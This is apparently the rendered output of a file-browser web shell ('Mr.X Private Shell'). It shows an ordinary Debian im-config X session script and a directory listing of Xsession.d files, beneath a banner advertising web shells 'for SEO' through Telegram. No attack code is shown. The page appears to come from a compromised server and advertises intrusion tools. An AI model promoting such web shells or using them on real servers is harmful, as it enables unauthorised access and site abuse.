__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh # vim: set sts=4 expandtab: # Copyright (C) 2012 Osamu Aoki <[email protected]> # Copyright (C) 2012 Aron Xu <[email protected]> # GNU General Public License version 2 or later. # # Input Method launcher hook ... see im-launch(1). # The hook script for dbus-launch is in 75 which changes $STARTUP string. # This shuld be befor this dbus-launch hook to ensure the working dbus # for input method. Thus moved from 80 to 70. IMLAUNCH=/usr/bin/im-launch if [ "$IM_CONFIG_PHASE" = 1 ]; then IM_CONFIG_CHECK_ENV=1 export IM_CONFIG_CHECK_ENV fi # If already tweaked, keep hands off :-) # If im-config is removed but not purged, keep hands off :-) if [ -z "$XMODIFIERS" ] && \ [ -z "$GTK_IM_MODULE" ] && \ [ -z "$QT_IM_MODULE" ] && \ [ -z "$CLUTTER_IM_MODULE" ] && \ [ -z "$SDL_IM_MODULE" ] && \ [ -r /usr/share/im-config/xinputrc.common ]; then IM_CONFIG_PHASE=1 export IM_CONFIG_PHASE # initialize all im-config common functions and parameters . /usr/share/im-config/xinputrc.common unset TEXTDOMAIN unset TEXTDOMAINDIR # source the first found configuration file if [ -r "$IM_CONFIG_XINPUTRC_USR" ]; then . $IM_CONFIG_XINPUTRC_USR elif [ -r "$IM_CONFIG_XINPUTRC_SYS" ]; then . $IM_CONFIG_XINPUTRC_SYS fi # always export variables even for manual configuration. export XMODIFIERS export GTK_IM_MODULE export QT_IM_MODULE export CLUTTER_IM_MODULE export SDL_IM_MODULE fi # Change $STARTUP string to im-launch while keeping the old $STARTUP string # as its arguments if [ "$XDG_SESSION_TYPE" != "wayland" ] && [ -x "$IMLAUNCH" ]; then STARTUP="$IMLAUNCH $STARTUP" fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 20dbus_xdg-runtime | File | 1.09 KB | 0644 |
|
| 20x11-common_process-args | File | 1.82 KB | 0644 |
|
| 30x11-common_xresources | File | 878 B | 0644 |
|
| 35x11-common_xhost-local | File | 389 B | 0644 |
|
| 40x11-common_xsessionrc | File | 187 B | 0644 |
|
| 50x11-common_determine-startup | File | 1.53 KB | 0644 |
|
| 55gnome-session_gnomerc | File | 743 B | 0644 |
|
| 60x11-common_xdg_path | File | 991 B | 0644 |
|
| 70im-config_launch | File | 1.64 KB | 0644 |
|
| 90atk-adaptor | File | 511 B | 0644 |
|
| 90gpg-agent | File | 880 B | 0644 |
|
| 90qt-a11y | File | 335 B | 0644 |
|
| 90x11-common_ssh-agent | File | 385 B | 0644 |
|
| 90xbrlapi | File | 585 B | 0644 |
|
| 99x11-common_start | File | 166 B | 0644 |
|